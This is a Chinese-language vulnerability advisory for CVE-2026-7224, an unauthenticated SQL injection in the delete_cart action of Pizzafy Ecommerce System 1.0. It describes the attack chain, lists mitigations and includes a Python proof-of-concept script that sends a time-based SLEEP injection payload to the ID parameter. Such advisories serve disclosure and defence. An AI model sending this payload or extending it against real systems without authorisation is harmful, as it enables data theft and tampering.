CVE-2026-7224: Pizzafy电商系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-7224

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pizzafy Ecommerce System

漏洞概述

SourceCodester Pizzafy Ecommerce System 1.0被发现存在高危安全漏洞。该漏洞位于/admin/ajax.php文件的delete_cart函数中，由于未对输入参数ID进行有效的安全过滤，导致存在SQL注入漏洞。攻击者无需身份认证即可通过网络远程发起攻击，成功利用该漏洞可能导致敏感数据泄露、数据篡改或服务不可用。

技术细节

该漏洞属于典型的SQL注入漏洞，根本原因在于后端代码未对用户输入进行严格的类型检查或转义。具体受影响文件为`/admin/ajax.php`，在执行`delete_cart`操作时，代码直接将HTTP请求中的`ID`参数拼接到SQL语句中执行。由于CVSS向量显示无需特权（PR:N）且无用户交互（UI:N），这表明该接口可能存在未授权访问缺陷。攻击者可构造包含恶意SQL语法的Payload（如UNION查询或布尔盲注语句），发送至服务器端。服务器解析后执行恶意命令，可能导致绕过登录验证、窃取数据库中的用户信息或订单数据，甚至在特定条件下删除数据表，严重威胁系统安全。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在运行SourceCodester Pizzafy Ecommerce System 1.0。

STEP 2

武器化

攻击者构造恶意的SQL注入Payload，针对`/admin/ajax.php`接口的`delete_cart`动作中的`ID`参数。

STEP 3

交付

攻击者向目标服务器发送特制的HTTP GET或POST请求，无需用户交互。

STEP 4

利用

服务器端后端脚本未过滤`ID`参数，直接将其拼接到SQL查询中执行，导致攻击者注入的恶意SQL语句在数据库运行。

STEP 5

影响

数据库执行非预期命令，导致数据泄露（C:L）、数据篡改（I:L）或服务受损（A:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli_vuln(target_url):
    """
    Proof of Concept for CVE-2026-7224
    Tests for SQL Injection in the 'ID' parameter of delete_cart action.
    """
    # The vulnerable endpoint
    full_url = f"{target_url}/admin/ajax.php"
    
    # Malicious payload to test SQL injection (Time-based)
    # This attempts to cause a delay of 5 seconds if the injection is successful
    payload = {
        "action": "delete_cart",
        "ID": "1' AND SLEEP(5)-- -"
    }

    try:
        print(f"[*] Sending request to: {full_url}")
        response = requests.get(full_url, params=payload, timeout=10)
        
        # Check if the response time indicates a successful sleep execution
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed! The application responded with a delay.")
            print(f"[+] Response time: {response.elapsed.total_seconds()} seconds")
        else:
            print("[-] Vulnerability not detected or payload failed.")
            print(f"[-] Response time: {response.elapsed.total_seconds()} seconds")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error during request: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost"
    check_sqli_vuln(target)

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施

如果无法立即升级，建议暂时限制对`/admin/ajax.php`路径的外部访问，或在应用层面对`ID`参数实施严格的正则过滤（例如仅允许纯数字），同时检查数据库日志以确认是否已被入侵。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7224
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7224
3 Details https://www.cvedetails.com/cve/CVE-2026-7224/
4 VulDB https://vuldb.com/cve/CVE-2026-7224
5 Link https://github.com/fernando-mengali/vulndb-submissions/blob/main/01-vul-SQLI.md
6 Link https://vuldb.com/submit/802387
7 Link https://vuldb.com/vuln/359824
8 Link https://vuldb.com/vuln/359824/cti
9 Link https://www.sourcecodester.com/